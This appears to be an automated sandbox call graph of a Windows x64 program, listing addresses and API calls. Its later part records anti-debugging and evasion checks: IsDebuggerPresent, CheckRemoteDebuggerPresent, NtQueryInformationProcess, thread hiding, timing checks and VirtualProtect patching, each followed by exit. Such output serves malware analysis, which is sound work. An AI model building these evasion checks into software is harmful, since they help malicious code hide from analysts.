Direct3DCreate9Ex 19808->20588 19811 7ff7866277da 19809->19811 19813 7ff78661e8c0 9 API calls 19811->19813 19817 7ff7866277ff 19813->19817 19814 7ff78662a7e0 7 API calls 19818 7ff786624ecf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19814->19818 19816 7ff78662cdc0 free 19816->19855 19820 7ff786627860 19817->19820 19824 7ff78662a7e0 7 API calls 19817->19824 19821 7ff78662a590 6 API calls 19818->19821 19819 7ff7866251b0 system 19823 7ff786625450 system 19819->19823 19819->19855 19820->19740 19822 7ff786627897 system 19820->19822 19825 7ff78662cdc0 free 19820->19825 19821->19855 19830 7ff786627990 19822->19830 19823->19855 19827 7ff78662783f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19824->19827 19825->19822 19828 7ff78662a590 6 API calls 19827->19828 19828->19817 19829 7ff786625760 system 19831 7ff786625a80 system 19829->19831 19829->19855 19832 7ff786611140 2 API calls 19830->19832 19831->19855 19833 7ff786627c4a 19832->19833 19835 7ff78661e8c0 9 API calls 19833->19835 19834 7ff786625c20 system 19834->19855 19836 7ff786627c6f 19835->19836 19837 7ff786627cd0 19836->19837 19839 7ff78662a7e0 7 API calls 19836->19839 19837->19740 19837->19742 19837->19748 19838 7ff786625db0 system 19838->19855 19840 7ff786627caf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 19839->19840 19842 7ff78662a590 6 API calls 19840->19842 19841 7ff786625f30 system 19841->19855 19842->19836 19843 7ff7866260b0 system 19843->19855 19844 7ff786626230 system 19844->19855 19845 7ff7866263b0 system 19845->19855 19846 7ff786626560 system 19846->19855 19847 7ff786626700 system 19847->19855 19848 7ff7866268a0 system 19848->19855 19849 7ff786626a30 system 19849->19855 19850 7ff786626bc0 system 19850->19855 19851 7ff786626d3c system 19851->19855 19852 7ff786626ec2 system 19852->19855 19853 7ff786627050 system 19854 7ff786627132 system 19853->19854 19853->19855 19854->19733 19855->19740 19855->19786 19855->19814 19855->19816 19855->19819 19855->19823 19855->19829 19855->19831 19855->19834 19855->19838 19855->19841 19855->19843 19855->19844 19855->19845 19855->19846 19855->19847 19855->19848 19855->19849 19855->19850 19855->19851 19855->19852 19855->19853 19855->19854 19856 7ff78662707b system 19855->19856 20545 7ff786611140 __acrt_iob_func 19855->20545 20548 7ff78661e8c0 19855->20548 19856->19733 19857 7ff78662d6dc GetModuleHandleW 19858 7ff78662d223 19857->19858 19858->19707 19858->19717 19860 7ff78662d5ae 19859->19860 19861 7ff78662d5bc memset RtlCaptureContext RtlLookupFunctionEntry 19860->19861 19862 7ff78662d632 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19861->19862 19863 7ff78662d5f6 RtlVirtualUnwind 19861->19863 19864 7ff78662d6b2 19862->19864 19863->19862 19864->19705 19866 7ff78661e8c0 9 API calls 19865->19866 19867 7ff786617780 19866->19867 19868 7ff78661e8c0 9 API calls 19867->19868 19869 7ff7866177af 19868->19869 19870 7ff78661e8c0 9 API calls 19869->19870 19871 7ff7866177de 19870->19871 19872 7ff78661e8c0 9 API calls 19871->19872 19873 7ff78661780d 19872->19873 19874 7ff78661e8c0 9 API calls 19873->19874 19875 7ff78661783c 19874->19875 19876 7ff78661e8c0 9 API calls 19875->19876 19877 7ff78661786b 19876->19877 19878 7ff78661e8c0 9 API calls 19877->19878 19879 7ff78661789a 19878->19879 19880 7ff78661e8c0 9 API calls 19879->19880 19881 7ff7866178c9 19880->19881 19882 7ff78661e8c0 9 API calls 19881->19882 19883 7ff7866178f8 19882->19883 19884 7ff78661e8c0 9 API calls 19883->19884 19885 7ff786617927 19884->19885 19886 7ff78661e8c0 9 API calls 19885->19886 19887 7ff786617956 19886->19887 19888 7ff78661e8c0 9 API calls 19887->19888 19889 7ff786617985 19888->19889 19890 7ff78661e8c0 9 API calls 19889->19890 19891 7ff7866179b4 19890->19891 19892 7ff78661e8c0 9 API calls 19891->19892 19893 7ff7866179e3 19892->19893 19894 7ff78661e8c0 9 API calls 19893->19894 19895 7ff786617a12 19894->19895 19896 7ff78661e8c0 9 API calls 19895->19896 19897 7ff786617a41 19896->19897 19898 7ff78661e8c0 9 API calls 19897->19898 19899 7ff786617a70 19898->19899 19900 7ff78661e8c0 9 API calls 19899->19900 19901 7ff786617a9f 19900->19901 19902 7ff78661e8c0 9 API calls 19901->19902 19903 7ff786617ace 19902->19903 19904 7ff78661e8c0 9 API calls 19903->19904 19905 7ff786617afd 19904->19905 19906 7ff78661e8c0 9 API calls 19905->19906 19907 7ff786617b2c 19906->19907 19908 7ff78661e8c0 9 API calls 19907->19908 19909 7ff786617b5b 19908->19909 19910 7ff78661e8c0 9 API calls 19909->19910 19911 7ff786617b8a 19910->19911 19912 7ff78661e8c0 9 API calls 19911->19912 19913 7ff786617bb9 19912->19913 19914 7ff78661e8c0 9 API calls 19913->19914 19915 7ff786617be8 19914->19915 19916 7ff78661e8c0 9 API calls 19915->19916 19917 7ff786617c17 19916->19917 19918 7ff78661e8c0 9 API calls 19917->19918 19919 7ff786617c46 19918->19919 19920 7ff78661e8c0 9 API calls 19919->19920 19921 7ff786617c75 19920->19921 19922 7ff78661e8c0 9 API calls 19921->19922 19923 7ff786617ca4 19922->19923 19924 7ff78661e8c0 9 API calls 19923->19924 19925 7ff786617cd3 19924->19925 19926 7ff78661e8c0 9 API calls 19925->19926 19927 7ff786617d02 19926->19927 19928 7ff78661e8c0 9 API calls 19927->19928 19929 7ff786617d31 19928->19929 19930 7ff78661e8c0 9 API calls 19929->19930 19931 7ff786617d60 19930->19931 19932 7ff78661e8c0 9 API calls 19931->19932 19933 7ff786617d8f 19932->19933 19934 7ff78661e8c0 9 API calls 19933->19934 19935 7ff786617dbe 19934->19935 19936 7ff78661e8c0 9 API calls 19935->19936 19937 7ff786617ded 19936->19937 19938 7ff78661e8c0 9 API calls 19937->19938 19939 7ff786617e1c 19938->19939 19940 7ff78661e8c0 9 API calls 19939->19940 19941 7ff786617e4b 19940->19941 19942 7ff78661e8c0 9 API calls 19941->19942 19943 7ff786617e7a 19942->19943 19944 7ff78661e8c0 9 API calls 19943->19944 19945 7ff786617ea9 19944->19945 19946 7ff78661e8c0 9 API calls 19945->19946 19947 7ff786617ed8 19946->19947 19948 7ff78661e8c0 9 API calls 19947->19948 19949 7ff786617f07 19948->19949 19950 7ff78661e8c0 9 API calls 19949->19950 19951 7ff786617f36 19950->19951 19952 7ff78661e8c0 9 API calls 19951->19952 19953 7ff786617f65 19952->19953 19954 7ff78661e8c0 9 API calls 19953->19954 19955 7ff786617f94 19954->19955 19956 7ff78661e8c0 9 API calls 19955->19956 19957 7ff786617fc3 19956->19957 19958 7ff78661e8c0 9 API calls 19957->19958 19959 7ff786617ff2 19958->19959 19960 7ff78661e8c0 9 API calls 19959->19960 19961 7ff786618021 19960->19961 19962 7ff78661e8c0 9 API calls 19961->19962 19963 7ff786618050 19962->19963 19964 7ff78661e8c0 9 API calls 19963->19964 19965 7ff78661807f 19964->19965 19966 7ff78661e8c0 9 API calls 19965->19966 19967 7ff7866180ae 19966->19967 19968 7ff78661e8c0 9 API calls 19967->19968 19969 7ff7866180dd 19968->19969 19970 7ff78661e8c0 9 API calls 19969->19970 19971 7ff78661810c 19970->19971 19972 7ff78661e8c0 9 API calls 19971->19972 19973 7ff78661813b 19972->19973 19974 7ff78661e8c0 9 API calls 19973->19974 19975 7ff78661816a 19974->19975 19976 7ff78661e8c0 9 API calls 19975->19976 19977 7ff786618199 19976->19977 19978 7ff78661e8c0 9 API calls 19977->19978 19979 7ff7866181c8 19978->19979 19980 7ff78661e8c0 9 API calls 19979->19980 19981 7ff7866181f7 19980->19981 19982 7ff78661e8c0 9 API calls 19981->19982 19983 7ff786618226 19982->19983 19984 7ff78661e8c0 9 API calls 19983->19984 19985 7ff786618255 19984->19985 19986 7ff78661e8c0 9 API calls 19985->19986 19987 7ff786618284 19986->19987 19988 7ff78661e8c0 9 API calls 19987->19988 19989 7ff7866182b3 19988->19989 19990 7ff78661e8c0 9 API calls 19989->19990 19991 7ff7866182e2 19990->19991 19992 7ff78661e8c0 9 API calls 19991->19992 19993 7ff786618311 19992->19993 19994 7ff78661e8c0 9 API calls 19993->19994 19995 7ff786618340 19994->19995 19996 7ff78661e8c0 9 API calls 19995->19996 19997 7ff78661836f 19996->19997 19998 7ff78661e8c0 9 API calls 19997->19998 19999 7ff78661839e 19998->19999 20000 7ff78661e8c0 9 API calls 19999->20000 20001 7ff7866183cd 20000->20001 20002 7ff78661e8c0 9 API calls 20001->20002 20003 7ff7866183fc 20002->20003 20004 7ff78661e8c0 9 API calls 20003->20004 20005 7ff78661842b 20004->20005 20006 7ff78661e8c0 9 API calls 20005->20006 20007 7ff78661845a 20006->20007 20008 7ff78661e8c0 9 API calls 20007->20008 20009 7ff786618489 20008->20009 20010 7ff78661e8c0 9 API calls 20009->20010 20011 7ff7866184b8 20010->20011 20012 7ff78661e8c0 9 API calls 20011->20012 20013 7ff7866184e7 20012->20013 20014 7ff78661e8c0 9 API calls 20013->20014 20015 7ff786618516 20014->20015 20016 7ff78661e8c0 9 API calls 20015->20016 20017 7ff786618545 20016->20017 20018 7ff78661e8c0 9 API calls 20017->20018 20019 7ff786618574 20018->20019 20020 7ff78661e8c0 9 API calls 20019->20020 20021 7ff7866185a3 20020->20021 20022 7ff78661e8c0 9 API calls 20021->20022 20023 7ff7866185d2 20022->20023 20024 7ff78661e8c0 9 API calls 20023->20024 20025 7ff786618601 20024->20025 20026 7ff78661e8c0 9 API calls 20025->20026 20027 7ff786618630 20026->20027 20028 7ff78661e8c0 9 API calls 20027->20028 20029 7ff78661865f 20028->20029 20030 7ff78661e8c0 9 API calls 20029->20030 20031 7ff78661868e 20030->20031 20032 7ff78661e8c0 9 API calls 20031->20032 20033 7ff7866186bd 20032->20033 20034 7ff78661e8c0 9 API calls 20033->20034 20035 7ff7866186ec 20034->20035 20036 7ff78661e8c0 9 API calls 20035->20036 20037 7ff78661871b 20036->20037 20038 7ff78661e8c0 9 API calls 20037->20038 20039 7ff78661874a 20038->20039 20040 7ff78661e8c0 9 API calls 20039->20040 20041 7ff786618779 20040->20041 20042 7ff78661e8c0 9 API calls 20041->20042 20043 7ff7866187a8 20042->20043 20044 7ff78661e8c0 9 API calls 20043->20044 20045 7ff7866187d7 20044->20045 20046 7ff78661e8c0 9 API calls 20045->20046 20047 7ff786618806 20046->20047 20048 7ff78661e8c0 9 API calls 20047->20048 20049 7ff786618835 20048->20049 20050 7ff78661e8c0 9 API calls 20049->20050 20051 7ff786618864 20050->20051 20052 7ff78661e8c0 9 API calls 20051->20052 20053 7ff786618893 20052->20053 20054 7ff78661e8c0 9 API calls 20053->20054 20055 7ff7866188c2 20054->20055 20056 7ff78661e8c0 9 API calls 20055->20056 20057 7ff7866188f1 20056->20057 20058 7ff78661e8c0 9 API calls 20057->20058 20059 7ff786618920 20058->20059 20060 7ff78661e8c0 9 API calls 20059->20060 20061 7ff78661894f 20060->20061 20062 7ff78661e8c0 9 API calls 20061->20062 20063 7ff78661897e 20062->20063 20064 7ff78661e8c0 9 API calls 20063->20064 20065 7ff7866189ad 20064->20065 20066 7ff78661e8c0 9 API calls 20065->20066 20067 7ff7866189dc 20066->20067 20068 7ff78661e8c0 9 API calls 20067->20068 20069 7ff786618a0b 20068->20069 20070 7ff78661e8c0 9 API calls 20069->20070 20071 7ff786618a3a 20070->20071 20072 7ff78661e8c0 9 API calls 20071->20072 20073 7ff786618a69 20072->20073 20074 7ff78661e8c0 9 API calls 20073->20074 20075 7ff786618a98 20074->20075 20076 7ff78661e8c0 9 API calls 20075->20076 20077 7ff786618ac7 20076->20077 20078 7ff78661e8c0 9 API calls 20077->20078 20079 7ff786618af6 20078->20079 20080 7ff78661e8c0 9 API calls 20079->20080 20081 7ff786618b25 20080->20081 20082 7ff78661e8c0 9 API calls 20081->20082 20083 7ff786618b4b 20082->20083 20084 7ff78661e8c0 9 API calls 20083->20084 20085 7ff786618b71 20084->20085 20086 7ff78661e8c0 9 API calls 20085->20086 20087 7ff786618b97 20086->20087 20088 7ff78661e8c0 9 API calls 20087->20088 20089 7ff786618bbd 20088->20089 20090 7ff78661e8c0 9 API calls 20089->20090 20091 7ff786618be3 20090->20091 20092 7ff78661e8c0 9 API calls 20091->20092 20093 7ff786618c09 20092->20093 20094 7ff78661e8c0 9 API calls 20093->20094 20095 7ff786618c2f 20094->20095 20096 7ff78661e8c0 9 API calls 20095->20096 20097 7ff786618c55 20096->20097 20098 7ff78661e8c0 9 API calls 20097->20098 20099 7ff786618c7e 20098->20099 20100 7ff78661e8c0 9 API calls 20099->20100 20101 7ff786618ca7 20100->20101 20102 7ff78661e8c0 9 API calls 20101->20102 20103 7ff786618cd0 20102->20103 20104 7ff786618d10 20103->20104 20105 7ff786618d0b 20103->20105 20107 7ff786618d04 _invalid_parameter_noinfo_noreturn 20103->20107 20106 7ff786618d51 20104->20106 20109 7ff786618d4c 20104->20109 20112 7ff786618d45 _invalid_parameter_noinfo_noreturn 20104->20112 20108 7ff78662cdc0 free 20105->20108 20110 7ff786618d92 20106->20110 20114 7ff786618d8d 20106->20114 20118 7ff786618d86 _invalid_parameter_noinfo_noreturn 20106->20118 20107->20105 20108->20104 20113 7ff78662cdc0 free 20109->20113 20111 7ff786618dd1 20110->20111 20116 7ff786618dcc 20110->20116 20120 7ff786618dc5 _invalid_parameter_noinfo_noreturn 20110->20120 20117 7ff786618e10 20111->20117 20122 7ff786618e0b 20111->20122 20125 7ff786618e04 _invalid_parameter_noinfo_noreturn 20111->20125 20112->20109 20113->20106 20115 7ff78662cdc0 free 20114->20115 20115->20110 20121 7ff78662cdc0 free 20116->20121 20119 7ff786618e4f 20117->20119 20123 7ff786618e4a 20117->20123 20128 7ff786618e43 _invalid_parameter_noinfo_noreturn 20117->20128 20118->20114 20124 7ff786618e8e 20119->20124 20130 7ff786618e89 20119->20130 20133 7ff786618e82 _invalid_parameter_noinfo_noreturn 20119->20133 20120->20116 20121->20111 20126 7ff78662cdc0 free 20122->20126 20129 7ff78662cdc0 free 20123->20129 20127 7ff786618ecd 20124->20127 20131 7ff786618ec8 20124->20131 20135 7ff786618ec1 _invalid_parameter_noinfo_noreturn 20124->20135 20125->20122 20126->20117 20132 7ff786618f0c 20127->20132 20137 7ff786618f07 20127->20137 20140 7ff786618f00 _invalid_parameter_noinfo_noreturn 20127->20140 20128->20123 20129->20119 20134 7ff78662cdc0 free 20130->20134 20136 7ff78662cdc0 free 20131->20136 20138 7ff786618f4b 20132->20138 20142 7ff786618f46 20132->20142 20143 7ff786618f3f _invalid_parameter_noinfo_noreturn 20132->20143 20133->20130 20134->20124 20135->20131 20136->20127 20141 7ff78662cdc0 free 20137->20141 20139 7ff786618f8a 20138->20139 20145 7ff786618f85 20138->20145 20148 7ff786618f7e _invalid_parameter_noinfo_noreturn 20138->20148 20146 7ff786618fcf 20139->20146 20150 7ff786618fca 20139->20150 20154 7ff786618fc3 _invalid_parameter_noinfo_noreturn 20139->20154 20140->20137 20141->20132 20144 7ff78662cdc0 free 20142->20144 20143->20142 20144->20138 20149 7ff78662cdc0 free 20145->20149 20147 7ff786619014 20146->20147 20152 7ff78661900f 20146->20152 20156 7ff786619008 _invalid_parameter_noinfo_noreturn 20146->20156 20153 7ff786619059 20147->20153 20158 7ff786619054 20147->20158 20161 7ff78661904d _invalid_parameter_noinfo_noreturn 20147->20161 20148->20145 20149->20139 20151 7ff78662cdc0 free 20150->20151 20151->20146 20157 7ff78662cdc0 free 20152->20157 20155 7ff78661909e 20153->20155 20159 7ff786619099 20153->20159 20163 7ff786619092 _invalid_parameter_noinfo_noreturn 20153->20163 20154->20150 20160 7ff7866190e3 20155->20160 20165 7ff7866190de 20155->20165 20169 7ff7866190d7 _invalid_parameter_noinfo_noreturn 20155->20169 20156->20152 20157->20147 20162 7ff78662cdc0 free 20158->20162 20164 7ff78662cdc0 free 20159->20164 20166 7ff786619128 20160->20166 20167 7ff786619123 20160->20167 20171 7ff78661911c _invalid_parameter_noinfo_noreturn 20160->20171 20161->20158 20162->20153 20163->20159 20164->20155 20170 7ff78662cdc0 free 20165->20170 20168 7ff78661916d 20166->20168 20173 7ff786619168 20166->20173 20176 7ff786619161 _invalid_parameter_noinfo_noreturn 20166->20176 20172 7ff78662cdc0 free 20167->20172 20174 7ff7866191b2 20168->20174 20178 7ff7866191ad 20168->20178 20182 7ff7866191a6 _invalid_parameter_noinfo_noreturn 20168->20182 20169->20165 20170->20160 20171->20167 20172->20166 20177 7ff78662cdc0 free 20173->20177 20175 7ff7866191f7 20174->20175 20180 7ff7866191f2 20174->20180 20184 7ff7866191eb _invalid_parameter_noinfo_noreturn 20174->20184 20181 7ff78661923c 20175->20181 20186 7ff786619237 20175->20186 20189 7ff786619230 _invalid_parameter_noinfo_noreturn 20175->20189 20176->20173 20177->20168 20179 7ff78662cdc0 free 20178->20179 20179->20174 20185 7ff78662cdc0 free 20180->20185 20183 7ff786619281 20181->20183 20187 7ff78661927c 20181->20187 20192 7ff786619275 _invalid_parameter_noinfo_noreturn 20181->20192 20182->20178 20188 7ff7866192c6 20183->20188 20194 7ff7866192c1 20183->20194 20197 7ff7866192ba _invalid_parameter_noinfo_noreturn 20183->20197 20184->20180 20185->20175 20190 7ff78662cdc0 free 20186->20190 20193 7ff78662cdc0 free 20187->20193 20191 7ff78661930b 20188->20191 20195 7ff786619306 20188->20195 20199 7ff7866192ff _invalid_parameter_noinfo_noreturn 20188->20199 20189->20186 20190->20181 20196 7ff786619350 20191->20196 20201 7ff78661934b 20191->20201 20204 7ff786619344 _invalid_parameter_noinfo_noreturn 20191->20204 20192->20187 20193->20183 20198 7ff78662cdc0 free 20194->20198 20200 7ff78662cdc0 free 20195->20200 20202 7ff786619395 20196->20202 20206 7ff786619390 20196->20206 20207 7ff786619389 _invalid_parameter_noinfo_noreturn 20196->20207 20197->20194 20198->20188 20199->20195 20200->20191 20205 7ff78662cdc0 free 20201->20205 20203 7ff7866193da 20202->20203 20209 7ff7866193d5 20202->20209 20212 7ff7866193ce _invalid_parameter_noinfo_noreturn 20202->20212 20210 7ff78661941f 20203->20210 20214 7ff78661941a 20203->20214 20218 7ff786619413 _invalid_parameter_noinfo_noreturn 20203->20218 20204->20201 20205->20196 20208 7ff78662cdc0 free 20206->20208 20207->20206 20208->20202 20213 7ff78662cdc0 free 20209->20213 20211 7ff786619464 20210->20211 20216 7ff78661945f 20210->20216 20220 7ff786619458 _invalid_parameter_noinfo_noreturn 20210->20220 20217 7ff7866194a9 20211->20217 20222 7ff7866194a4 20211->20222 20225 7ff78661949d _invalid_parameter_noinfo_noreturn 20211->20225 20212->20209 20213->20203 20215 7ff78662cdc0 free 20214->20215 20215->20210 20221 7ff78662cdc0 free 20216->20221 20219 7ff7866194ee 20217->20219 20223 7ff7866194e9 20217->20223 20227 7ff7866194e2 _invalid_parameter_noinfo_noreturn 20217->20227 20218->20214 20224 7ff786619533 20219->20224 20229 7ff78661952e 20219->20229 20233 7ff786619527 _invalid_parameter_noinfo_noreturn 20219->20233 20220->20216 20221->20211 20226 7ff78662cdc0 free 20222->20226 20228 7ff78662cdc0 free 20223->20228 20230 7ff786619578 20224->20230 20231 7ff786619573 20224->20231 20235 7ff78661956c _invalid_parameter_noinfo_noreturn 20224->20235 20225->20222 20226->20217 20227->20223 20228->20219 20234 7ff78662cdc0 free 20229->20234 20232 7ff7866195bd 20230->20232 20237 7ff7866195b8 20230->20237 20239 7ff7866195b1 _invalid_parameter_noinfo_noreturn 20230->20239 20236 7ff78662cdc0 free 20231->20236 20238 7ff786619602 20232->20238 20241 7ff7866195fd 20232->20241 20244 7ff7866195f6 _invalid_parameter_noinfo_noreturn 20232->20244 20233->20229 20234->20224 20235->20231 20236->20230 20240 7ff78662cdc0 free 20237->20240 20243 7ff786619642 20238->20243 20247 7ff78661963b _invalid_parameter_noinfo_noreturn 20238->20247 20252 7ff786619647 20238->20252 20239->20237 20240->20232 20242 7ff78662cdc0 free 20241->20242 20242->20238 20248 7ff78662cdc0 free 20243->20248 20244->20241 20245 7ff78661968c 20246 7ff7866196d1 20245->20246 20250 7ff7866196cc 20245->20250 20256 7ff7866196c5 _invalid_parameter_noinfo_noreturn 20245->20256 20251 7ff786619716 20246->20251 20258 7ff786619711 20246->20258 20260 7ff78661970a _invalid_parameter_noinfo_noreturn 20246->20260 20247->20243 20248->20252 20249 7ff786619687 20254 7ff78662cdc0 free 20249->20254 20257 7ff78662cdc0 free 20250->20257 20660 7ff786629810 20251->20660 20252->20245 20252->20249 20253 7ff786619680 _invalid_parameter_noinfo_noreturn 20252->20253 20253->20249 20254->20245 20256->20250 20257->20246 20261 7ff78662cdc0 free 20258->20261 20260->20258 20261->20251 20262 7ff786629810 2 API calls 20263 7ff786619730 20262->20263 20264 7ff786629810 2 API calls 20263->20264 20265 7ff78661973d 20264->20265 20266 7ff786629810 2 API calls 20265->20266 20267 7ff78661974a 20266->20267 20268 7ff786629810 2 API calls 20267->20268 20269 7ff786619757 20268->20269 20270 7ff786629810 2 API calls 20269->20270 20271 7ff786619764 20270->20271 20272 7ff786629810 2 API calls 20271->20272 20273 7ff786619771 20272->20273 20274 7ff786629810 2 API calls 20273->20274 20275 7ff78661977e 20274->20275 20276 7ff786629810 2 API calls 20275->20276 20277 7ff78661978b 20276->20277 20278 7ff786629810 2 API calls 20277->20278 20279 7ff786619798 20278->20279 20280 7ff786629810 2 API calls 20279->20280 20281 7ff7866197a5 20280->20281 20282 7ff786629810 2 API calls 20281->20282 20283 7ff7866197b2 20282->20283 20284 7ff786629810 2 API calls 20283->20284 20285 7ff7866197bf 20284->20285 20286 7ff786629810 2 API calls 20285->20286 20287 7ff7866197cc 20286->20287 20288 7ff786629810 2 API calls 20287->20288 20289 7ff7866197d9 20288->20289 20290 7ff786629810 2 API calls 20289->20290 20291 7ff7866197e6 20290->20291 20292 7ff786629810 2 API calls 20291->20292 20293 7ff7866197f3 20292->20293 20294 7ff786629810 2 API calls 20293->20294 20295 7ff786619800 20294->20295 20296 7ff786629810 2 API calls 20295->20296 20297 7ff78661980d 20296->20297 20298 7ff786629810 2 API calls 20297->20298 20299 7ff78661981a 20298->20299 20300 7ff786629810 2 API calls 20299->20300 20301 7ff786619827 20300->20301 20302 7ff786629810 2 API calls 20301->20302 20303 7ff786619834 20302->20303 20304 7ff786629810 2 API calls 20303->20304 20305 7ff786619841 20304->20305 20306 7ff786629810 2 API calls 20305->20306 20307 7ff78661984e 20306->20307 20308 7ff786629810 2 API calls 20307->20308 20309 7ff78661985b 20308->20309 20310 7ff786629810 2 API calls 20309->20310 20311 7ff786619868 20310->20311 20312 7ff786629810 2 API calls 20311->20312 20313 7ff786619875 20312->20313 20314 7ff786629810 2 API calls 20313->20314 20315 7ff786619882 20314->20315 20316 7ff786629810 2 API calls 20315->20316 20317 7ff78661988f 20316->20317 20318 7ff786629810 2 API calls 20317->20318 20319 7ff78661989c 20318->20319 20320 7ff786629810 2 API calls 20319->20320 20321 7ff7866198a9 20320->20321 20322 7ff786629810 2 API calls 20321->20322 20323 7ff7866198b6 20322->20323 20324 7ff786629810 2 API calls 20323->20324 20325 7ff7866198c3 20324->20325 20326 7ff786629810 2 API calls 20325->20326 20327 7ff7866198d0 20326->20327 20328 7ff786629810 2 API calls 20327->20328 20329 7ff7866198dd 20328->20329 20330 7ff786629810 2 API calls 20329->20330 20331 7ff7866198ea 20330->20331 20332 7ff786629810 2 API calls 20331->20332 20333 7ff7866198f7 20332->20333 20334 7ff786629810 2 API calls 20333->20334 20335 7ff786619904 20334->20335 20336 7ff786629810 2 API calls 20335->20336 20337 7ff786619911 20336->20337 20338 7ff786629810 2 API calls 20337->20338 20339 7ff78661991e 20338->20339 20340 7ff786629810 2 API calls 20339->20340 20341 7ff78661992b 20340->20341 20342 7ff786629810 2 API calls 20341->20342 20343 7ff786619938 20342->20343 20344 7ff786629810 2 API calls 20343->20344 20345 7ff786619945 20344->20345 20346 7ff786629810 2 API calls 20345->20346 20347 7ff786619952 20346->20347 20348 7ff786629810 2 API calls 20347->20348 20349 7ff78661995f 20348->20349 20350 7ff786629810 2 API calls 20349->20350 20351 7ff78661996c 20350->20351 20352 7ff786629810 2 API calls 20351->20352 20353 7ff786619979 20352->20353 20354 7ff786629810 2 API calls 20353->20354 20355 7ff786619986 20354->20355 20356 7ff786629810 2 API calls 20355->20356 20357 7ff786619993 20356->20357 20358 7ff786629810 2 API calls 20357->20358 20359 7ff7866199a0 20358->20359 20360 7ff786629810 2 API calls 20359->20360 20361 7ff7866199ad 20360->20361 20362 7ff786629810 2 API calls 20361->20362 20363 7ff7866199ba 20362->20363 20364 7ff786629810 2 API calls 20363->20364 20365 7ff7866199c7 20364->20365 20366 7ff786629810 2 API calls 20365->20366 20367 7ff7866199d4 20366->20367 20368 7ff786629810 2 API calls 20367->20368 20369 7ff7866199e1 20368->20369 20370 7ff786629810 2 API calls 20369->20370 20371 7ff7866199ee 20370->20371 20372 7ff786629810 2 API calls 20371->20372 20373 7ff7866199fb 20372->20373 20374 7ff786629810 2 API calls 20373->20374 20375 7ff786619a08 20374->20375 20376 7ff786629810 2 API calls 20375->20376 20377 7ff786619a15 20376->20377 20378 7ff786629810 2 API calls 20377->20378 20379 7ff786619a22 20378->20379 20380 7ff786629810 2 API calls 20379->20380 20381 7ff786619a2f 20380->20381 20382 7ff786629810 2 API calls 20381->20382 20383 7ff786619a3c 20382->20383 20384 7ff786629810 2 API calls 20383->20384 20385 7ff786619a49 20384->20385 20386 7ff786629810 2 API calls 20385->20386 20387 7ff786619a56 20386->20387 20388 7ff786629810 2 API calls 20387->20388 20389 7ff786619a63 20388->20389 20390 7ff786629810 2 API calls 20389->20390 20391 7ff786619a70 20390->20391 20392 7ff786629810 2 API calls 20391->20392 20393 7ff786619a7d 20392->20393 20394 7ff786629810 2 API calls 20393->20394 20395 7ff786619a8a 20394->20395 20396 7ff786629810 2 API calls 20395->20396 20397 7ff786619a97 20396->20397 20398 7ff786629810 2 API calls 20397->20398 20399 7ff786619aa4 20398->20399 20400 7ff786629810 2 API calls 20399->20400 20401 7ff786619ab1 20400->20401 20402 7ff786629810 2 API calls 20401->20402 20403 7ff786619abe 20402->20403 20404 7ff786629810 2 API calls 20403->20404 20405 7ff786619acb 20404->20405 20406 7ff786629810 2 API calls 20405->20406 20407 7ff786619ad8 20406->20407 20408 7ff786629810 2 API calls 20407->20408 20409 7ff786619ae5 20408->20409 20410 7ff786629810 2 API calls 20409->20410 20411 7ff786619af2 20410->20411 20412 7ff786629810 2 API calls 20411->20412 20413 7ff786619aff 20412->20413 20414 7ff786629810 2 API calls 20413->20414 20415 7ff786619b0c 20414->20415 20416 7ff786629810 2 API calls 20415->20416 20417 7ff786619b19 20416->20417 20418 7ff786629810 2 API calls 20417->20418 20419 7ff786619b26 20418->20419 20420 7ff78662c970 8 API calls 20419->20420 20421 7ff786619b35 20420->20421 20422 7ff786614760 GetModuleHandleA GetProcAddress VirtualProtect VirtualProtect 20421->20422 20423 7ff786614220 15 API calls 20422->20423 20424 7ff7866147e4 LoadLibraryA GetProcAddress 20423->20424 20425 7ff786614809 GetCurrentThread NtSetInformationThread 20424->20425 20426 7ff78661481f QueryPerformanceFrequency QueryPerformanceCounter 20424->20426 20425->20426 20427 7ff786614840 20426->20427 20427->20427 20428 7ff786614855 QueryPerformanceCounter 20427->20428 20429 7ff78661488e 20428->20429 20430 7ff786614b81 20428->20430 20433 7ff78662a9e0 7 API calls 20429->20433 20431 7ff78662c970 8 API calls 20430->20431 20432 7ff786614b8e 20431->20432 20435 7ff786614220 20432->20435 20434 7ff786614b65 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20433->20434 20434->20430 20666 7ff78662e0e0 20435->20666 20438 7ff786614260 20439 7ff78662a590 6 API calls 20438->20439 20440 7ff7866142da 20439->20440 20441 7ff78662c970 8 API calls 20440->20441 20442 7ff7866142ea 20441->20442 20443 7ff786614bd0 IsDebuggerPresent 20442->20443 20444 7ff786614e91 GetCurrentProcess CheckRemoteDebuggerPresent 20443->20444 20448 7ff786614c0d 20443->20448 20445 7ff786615151 LoadLibraryA GetProcAddress GetCurrentProcess NtQueryInformationProcess 20444->20445 20451 7ff786614eb5 20444->20451 20446 7ff786615441 memset GetCurrentThread GetThreadContext 20445->20446 20454 7ff78661519e 20445->20454 20447 7ff786615644 20446->20447 20465 7ff786615476 20446->20465 20668 7ff786614300 20447->20668 20450 7ff78662a9e0 7 API calls 20448->20450 20453 7ff786614e75 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20450->20453 20452 7ff78662a9e0 7 API calls 20451->20452 20455 7ff786615135 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20452->20455 20453->20444 20454->20446 20457 7ff78662a9e0 7 API calls 20454->20457 20455->20445 20456 7ff7866157f4 GetCurrentProcess OpenProcessToken 20458 7ff786615811 GetTokenInformation 20456->20458 20459 7ff786615864 20456->20459 20460 7ff786615425 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20457->20460 20462 7ff786615859 CloseHandle 20458->20462 20463 7ff786615835 20458->20463 20705 7ff786614660 20459->20705 20460->20446 20461 7ff78662a9e0 7 API calls 20466 7ff786615628 